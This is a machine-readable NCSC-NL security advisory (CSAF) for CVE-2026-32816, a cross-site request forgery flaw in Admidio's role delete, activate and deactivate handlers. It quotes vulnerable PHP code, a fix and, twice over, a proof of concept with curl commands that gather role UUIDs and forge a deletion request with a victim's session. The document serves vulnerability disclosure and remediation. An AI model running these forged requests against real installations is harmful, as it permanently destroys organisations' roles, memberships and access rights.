{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-32816", "tracking": { "current_release_date": "2026-03-25T07:49:48.492167Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-32816", "initial_release_date": "2026-03-18T23:09:20.218415Z", "revision_history": [ { "date": "2026-03-18T23:09:20.218415Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-18T23:09:29.645677Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-19T15:31:03.868635Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T18:20:49.789481Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T18:20:53.643272Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-20T18:22:15.591527Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-20T18:22:18.524549Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-03-20T18:37:08.792707Z", "number": "8", "summary": "Unknown change." }, { "date": "2026-03-20T21:41:56.311013Z", "number": "9", "summary": "References created (2)." }, { "date": "2026-03-20T21:59:35.322236Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T21:59:38.068121Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-21T13:46:47.482656Z", "number": "12", "summary": "References removed (2)." }, { "date": "2026-03-22T00:52:10.233101Z", "number": "13", "summary": "References created (2)." }, { "date": "2026-03-22T11:25:11.747851Z", "number": "14", "summary": "References removed (2)." }, { "date": "2026-03-23T00:54:20.795004Z", "number": "15", "summary": "References created (2)." }, { "date": "2026-03-23T05:16:18.086308Z", "number": "16", "summary": "References removed (2)." }, { "date": "2026-03-24T13:47:07.870073Z", "number": "17", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-24T13:47:11.332013Z", "number": "18", "summary": "NCSC Score updated." }, { "date": "2026-03-24T20:56:43.650172Z", "number": "19", "summary": "References created (2)." }, { "date": "2026-03-24T20:57:15.697288Z", "number": "20", "summary": "NCSC Score updated." } ], "status": "interim", "version": "20" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=5.0.0|<5.0.7", "product": { "name": "vers:unknown/>=5.0.0|<5.0.7", "product_id": "CSAFPID-5892344", "product_identification_helper": { "cpe": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "Admidio" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=5.0.0|<5.0.7", "product": { "name": "vers:unknown/>=5.0.0|<5.0.7", "product_id": "CSAFPID-5846255" } } ], "category": "product_name", "name": "admidio" } ], "category": "vendor", "name": "Admidio" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-32816", "cwe": { "id": "CWE-352", "name": "Cross-Site Request Forgery (CSRF)" }, "notes": [ { "category": "description", "text": "## Summary\n\nThe `delete`, `activate`, and `deactivate` modes in `modules/groups-roles/groups_roles.php` perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to `callUrlHideElement()`, which includes it in the POST body, but the server-side handlers ignore `$_POST[\"adm_csrf_token\"]` entirely for these three modes. An attacker who can discover a role UUID (visible in the public `cards` view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the `rol_assign_roles` right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data.\n\n## Details\n\n### CSRF Token Is Sent but Never Validated\n\nFile: `D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php`, lines 150-173\n\nThe `save` mode (lines 143-148) is CSRF-protected via `RolesService::save()` which calls `getFormObject($_POST[\"adm_csrf_token\"])->validate()`. The `delete`, `activate`, and `deactivate` modes receive no equivalent protection:\n\n```php\ncase 'delete':\n // delete role from database\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n if ($role->delete()) {\n echo json_encode(array('status' => 'success'));\n }\n break;\n\ncase 'activate':\n // set role active\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n $role->activate();\n echo 'done';\n break;\n\ncase 'deactivate':\n // set role inactive\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n $role->deactivate();\n echo 'done';\n break;\n```\n\nThe only input validated is `$getRoleUUID` at line 41, checked as a `'uuid'` type. This prevents SQL injection but provides no CSRF protection.\n\n### Client-Side UI Passes Token; Server Ignores It\n\nFile: `D:/bugcrowd/admidio/repo/system/js/common_functions.js`, lines 101-129\n\nThe presenter embeds the CSRF token into the JavaScript `callUrlHideElement()` call (GroupsRolesPresenter.php line 131). The function sends it in an AJAX POST body:\n\n```javascript\nfunction callUrlHideElement(elementId, url, csrfToken, callback) {\n $.post(url, {\n \"adm_csrf_token\": csrfToken, // sent in POST body\n \"uuid\": elementId\n }, function(data) { ... });\n}\n```\n\nThe server-side handler reads `mode` from `$_GET` but never reads or validates `$_POST[\"adm_csrf_token\"]` for `delete`, `activate`, or `deactivate`. An attacker omits the token field entirely; the server does not check for its presence.\n\n### Who Can Be the CSRF Victim\n\nFile: `D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php`, lines 49-54\n\n```php\nif ($getMode !== 'cards') {\n // only users with the special right are allowed to manage roles\n if (!$gCurrentUser->isAdministratorRoles()) {\n throw new Exception('SYS_NO_RIGHTS');\n }\n}\n```\n\n`isAdministratorRoles()` maps to `checkRolesRight('rol_assign_roles')`. This is a delegated organizational right, not full system administrator (`isAdministrator()`) access. Any member granted the right to manage roles -- for example, a volunteer coordinator or chapter secretary -- is a valid CSRF victim.\n\n### Role UUIDs Are Discoverable Without Authentication\n\nFile: `D:/bugcrowd/admidio/repo/src/UI/Presenter/GroupsRolesPresenter.php`, line 84\n\n```php\n$templateRow['id'] = 'role_' . $role->getValue('rol_uuid');\n```\n\nThe `cards` mode (the default view) does not require the `rol_assign_roles` right and is publicly reachable when the module is enabled. Role UUIDs appear as HTML element IDs and in action data attributes in the page source. An unauthenticated visitor can collect all role UUIDs before staging the CSRF attack against a logged-in victim.\n\n### Role::delete() Is Permanent and Cascading\n\nFile: `D:/bugcrowd/admidio/repo/src/Roles/Entity/Role.php`, lines 264-288\n\n```php\n$this->db->startTransaction();\n\n// Remove all role dependency relationships\n$sql = 'DELETE FROM ' . TBL_ROLE_DEPENDENCIES . ' WHERE rld_rol_id_parent = ? OR rld_rol_id_child = ?';\n$this->db->queryPrepared($sql, array($rolId, $rolId));\n\n// Remove all memberships\n$sql = 'DELETE FROM ' . TBL_MEMBERS . ' WHERE mem_rol_id = ?';\n$this->db->queryPrepared($sql, array($rolId));\n\n// Disassociate all events linked to this role\n$sql = 'UPDATE ' . TBL_EVENTS . ' SET dat_rol_id = NULL WHERE dat_rol_id = ?';\n$this->db->queryPrepared($sql, array($rolId));\n\n// Remove all access-right entries for this role\n$sql = 'DELETE FROM ' . TBL_ROLES_RIGHTS_DATA . ' WHERE rrd_rol_id = ?';\n$this->db->queryPrepared($sql, array($rolId));\n```\n\nThere is no soft-delete or recycle bin. Deletion permanently removes the role record, all memberships within it, all role dependency rules, and all per-module access rights granted to the role.\n\n## PoC\n\nThe attacker hosts the following HTML page and tricks a user with the `rol_assign_roles` right into visiting it while logged in to Admidio.\n\n**Step 1: Collect role UUIDs from the public cards view (no login required)**\n\n```\ncurl \"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=cards\"\n```\n\nRole UUIDs appear in the HTML source as element IDs (`id=\"role_\"`) and in action data attributes.\n\n**Step 2: Forge a deletion request (no CSRF token needed)**\n\n```\ncurl -X POST \\\\\n \"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete&role_uuid=ROLE_UUID\" \\\\\n -H \"Cookie: ADMIDIO_SESSION_ID=victim_session\" \\\\\n -d \"\"\n```\n\nExpected response: `{\"status\":\"success\"}`\n\nThe role, all its memberships, all event associations, and all access-right entries are permanently deleted. No `adm_csrf_token` field is required.\n\n**Step 3 (CSRF delivery -- attacker hosts externally)**\n\n```html\n\n\n\n
\n \n
\n\n\n```\n\nWhen any user with `rol_assign_roles` views this page while authenticated, the targeted role is permanently deleted without any confirmation from the victim.\n\n**Step 4 (Deactivate via CSRF -- disables a role without deleting it)**\n\n```html\n
\n
\n```\n\nDeactivating a role removes all active members from the role and hides it, effectively revoking access for all members without destroying the role record.\n\n## Impact\n\n- **Permanent Role Deletion:** A CSRF-triggered `delete` request irrecoverably removes the targeted role and all associated memberships, event links, and permission grants. There is no undo path other than a database restore.\n- **Mass Membership Revocation:** Every member of the deleted role loses their membership record simultaneously. Role membership in Admidio controls access to events, document folders, mailing lists, and custom profile-field visibility.\n- **Role State Manipulation:** An attacker can force `activate` or `deactivate` on any role. Deactivation silently strips access from an entire group without deleting the role record.\n- **Low Attack Surface Requirement:** The attacker only needs to trick a user with the delegated `rol_assign_roles` right -- not a full system administrator. Such users are common in organizations that delegate group management to department heads or committee chairs.\n- **UUID Pre-Collection Without Authentication:** Role UUIDs are harvested from the public cards view before the CSRF attack is staged, making target selection trivial.\n\n## Recommended Fix\n\nAdd `SecurityUtils::validateCsrfToken($_POST[\"adm_csrf_token\"])` at the beginning of each vulnerable case, consistent with how other mutative actions in the codebase are protected.\n\n```php\n// File: modules/groups-roles/groups_roles.php\n\ncase 'delete':\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n if ($role->delete()) {\n echo json_encode(array('status' => 'success'));\n }\n break;\n\ncase 'activate':\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n $role->activate();\n echo 'done';\n break;\n\ncase 'deactivate':\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n $role->deactivate();\n echo 'done';\n break;\n```\n\nSince `callUrlHideElement` already sends `adm_csrf_token` in the POST body, adding the server-side validation call is a one-line fix per case and requires no changes to the front-end JavaScript or templates.", "title": "github - https://github.com/advisories/GHSA-wwg8-6ffr-h4q2" }, { "category": "description", "text": "## Summary\n\nThe `delete`, `activate`, and `deactivate` modes in `modules/groups-roles/groups_roles.php` perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to `callUrlHideElement()`, which includes it in the POST body, but the server-side handlers ignore `$_POST[\"adm_csrf_token\"]` entirely for these three modes. An attacker who can discover a role UUID (visible in the public `cards` view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the `rol_assign_roles` right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data.\n\n## Details\n\n### CSRF Token Is Sent but Never Validated\n\nFile: `D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php`, lines 150-173\n\nThe `save` mode (lines 143-148) is CSRF-protected via `RolesService::save()` which calls `getFormObject($_POST[\"adm_csrf_token\"])->validate()`. The `delete`, `activate`, and `deactivate` modes receive no equivalent protection:\n\n```php\ncase 'delete':\n // delete role from database\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n if ($role->delete()) {\n echo json_encode(array('status' => 'success'));\n }\n break;\n\ncase 'activate':\n // set role active\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n $role->activate();\n echo 'done';\n break;\n\ncase 'deactivate':\n // set role inactive\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n $role->deactivate();\n echo 'done';\n break;\n```\n\nThe only input validated is `$getRoleUUID` at line 41, checked as a `'uuid'` type. This prevents SQL injection but provides no CSRF protection.\n\n### Client-Side UI Passes Token; Server Ignores It\n\nFile: `D:/bugcrowd/admidio/repo/system/js/common_functions.js`, lines 101-129\n\nThe presenter embeds the CSRF token into the JavaScript `callUrlHideElement()` call (GroupsRolesPresenter.php line 131). The function sends it in an AJAX POST body:\n\n```javascript\nfunction callUrlHideElement(elementId, url, csrfToken, callback) {\n $.post(url, {\n \"adm_csrf_token\": csrfToken, // sent in POST body\n \"uuid\": elementId\n }, function(data) { ... });\n}\n```\n\nThe server-side handler reads `mode` from `$_GET` but never reads or validates `$_POST[\"adm_csrf_token\"]` for `delete`, `activate`, or `deactivate`. An attacker omits the token field entirely; the server does not check for its presence.\n\n### Who Can Be the CSRF Victim\n\nFile: `D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php`, lines 49-54\n\n```php\nif ($getMode !== 'cards') {\n // only users with the special right are allowed to manage roles\n if (!$gCurrentUser->isAdministratorRoles()) {\n throw new Exception('SYS_NO_RIGHTS');\n }\n}\n```\n\n`isAdministratorRoles()` maps to `checkRolesRight('rol_assign_roles')`. This is a delegated organizational right, not full system administrator (`isAdministrator()`) access. Any member granted the right to manage roles -- for example, a volunteer coordinator or chapter secretary -- is a valid CSRF victim.\n\n### Role UUIDs Are Discoverable Without Authentication\n\nFile: `D:/bugcrowd/admidio/repo/src/UI/Presenter/GroupsRolesPresenter.php`, line 84\n\n```php\n$templateRow['id'] = 'role_' . $role->getValue('rol_uuid');\n```\n\nThe `cards` mode (the default view) does not require the `rol_assign_roles` right and is publicly reachable when the module is enabled. Role UUIDs appear as HTML element IDs and in action data attributes in the page source. An unauthenticated visitor can collect all role UUIDs before staging the CSRF attack against a logged-in victim.\n\n### Role::delete() Is Permanent and Cascading\n\nFile: `D:/bugcrowd/admidio/repo/src/Roles/Entity/Role.php`, lines 264-288\n\n```php\n$this->db->startTransaction();\n\n// Remove all role dependency relationships\n$sql = 'DELETE FROM ' . TBL_ROLE_DEPENDENCIES . ' WHERE rld_rol_id_parent = ? OR rld_rol_id_child = ?';\n$this->db->queryPrepared($sql, array($rolId, $rolId));\n\n// Remove all memberships\n$sql = 'DELETE FROM ' . TBL_MEMBERS . ' WHERE mem_rol_id = ?';\n$this->db->queryPrepared($sql, array($rolId));\n\n// Disassociate all events linked to this role\n$sql = 'UPDATE ' . TBL_EVENTS . ' SET dat_rol_id = NULL WHERE dat_rol_id = ?';\n$this->db->queryPrepared($sql, array($rolId));\n\n// Remove all access-right entries for this role\n$sql = 'DELETE FROM ' . TBL_ROLES_RIGHTS_DATA . ' WHERE rrd_rol_id = ?';\n$this->db->queryPrepared($sql, array($rolId));\n```\n\nThere is no soft-delete or recycle bin. Deletion permanently removes the role record, all memberships within it, all role dependency rules, and all per-module access rights granted to the role.\n\n## PoC\n\nThe attacker hosts the following HTML page and tricks a user with the `rol_assign_roles` right into visiting it while logged in to Admidio.\n\n**Step 1: Collect role UUIDs from the public cards view (no login required)**\n\n```\ncurl \"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=cards\"\n```\n\nRole UUIDs appear in the HTML source as element IDs (`id=\"role_\"`) and in action data attributes.\n\n**Step 2: Forge a deletion request (no CSRF token needed)**\n\n```\ncurl -X POST \\\\\n \"https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete&role_uuid=ROLE_UUID\" \\\\\n -H \"Cookie: ADMIDIO_SESSION_ID=victim_session\" \\\\\n -d \"\"\n```\n\nExpected response: `{\"status\":\"success\"}`\n\nThe role, all its memberships, all event associations, and all access-right entries are permanently deleted. No `adm_csrf_token` field is required.\n\n**Step 3 (CSRF delivery -- attacker hosts externally)**\n\n```html\n\n\n\n
\n \n
\n\n\n```\n\nWhen any user with `rol_assign_roles` views this page while authenticated, the targeted role is permanently deleted without any confirmation from the victim.\n\n**Step 4 (Deactivate via CSRF -- disables a role without deleting it)**\n\n```html\n
\n
\n```\n\nDeactivating a role removes all active members from the role and hides it, effectively revoking access for all members without destroying the role record.\n\n## Impact\n\n- **Permanent Role Deletion:** A CSRF-triggered `delete` request irrecoverably removes the targeted role and all associated memberships, event links, and permission grants. There is no undo path other than a database restore.\n- **Mass Membership Revocation:** Every member of the deleted role loses their membership record simultaneously. Role membership in Admidio controls access to events, document folders, mailing lists, and custom profile-field visibility.\n- **Role State Manipulation:** An attacker can force `activate` or `deactivate` on any role. Deactivation silently strips access from an entire group without deleting the role record.\n- **Low Attack Surface Requirement:** The attacker only needs to trick a user with the delegated `rol_assign_roles` right -- not a full system administrator. Such users are common in organizations that delegate group management to department heads or committee chairs.\n- **UUID Pre-Collection Without Authentication:** Role UUIDs are harvested from the public cards view before the CSRF attack is staged, making target selection trivial.\n\n## Recommended Fix\n\nAdd `SecurityUtils::validateCsrfToken($_POST[\"adm_csrf_token\"])` at the beginning of each vulnerable case, consistent with how other mutative actions in the codebase are protected.\n\n```php\n// File: modules/groups-roles/groups_roles.php\n\ncase 'delete':\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n if ($role->delete()) {\n echo json_encode(array('status' => 'success'));\n }\n break;\n\ncase 'activate':\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n $role->activate();\n echo 'done';\n break;\n\ncase 'deactivate':\n SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);\n $role = new Role($gDb);\n $role->readDataByUuid($getRoleUUID);\n $role->deactivate();\n echo 'done';\n break;\n```\n\nSince `callUrlHideElement` already sends `adm_csrf_token` in the POST body, adding the server-side validation call is a one-line fix per case and requires no changes to the front-end JavaScript or templates.", "title": "github - https://api.github.com/advisories/GHSA-wwg8-6ffr-h4q2" }, { "category": "description", "text": "Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST[\"adm_csrf_token\"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data. If exploited, an attacker can trick any user with delegated role-assignment rights into permanently deleting roles, mass-revoking all associated memberships and access to events, documents, and mailing lists, or silently activating or deactivating entire groups, with target role UUIDs trivially harvested from the unauthenticated public cards view and no undo path short of a database restore. This issue has been fixed in version 5.0.7.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32816" }, { "category": "description", "text": "Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST[\"adm_csrf_token\"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data. If exploited, an attacker can trick any user with delegated role-assignment rights into permanently deleting roles, mass-revoking all associated memberships and access to events, documents, and mailing lists, or silently activating or deactivating entire groups, with target role UUIDs trivially harvested from the unauthenticated public cards view and no undo path short of a database restore. This issue has been fixed in version 5.0.7.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32816.json" }, { "category": "other", "text": "0.00014", "title": "EPSS" }, { "category": "other", "text": "3.4", "title": "NCSC Score" }, { "category": "other", "text": "The value of the most recent EPSS score, Is related to CWE-352 (Cross-Site Request Forgery (CSRF)), There is exploit data available from source Nvd, Is related to (a version of) an uncommon product", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5846255", "CSAFPID-5892344" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-wwg8-6ffr-h4q2" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-wwg8-6ffr-h4q2" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-wwg8-6ffr-h4q2" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32816" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32816.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-wwg8-6ffr-h4q2" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32816" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5846255", "CSAFPID-5892344" ] } ], "title": "CVE-2026-32816" } ] }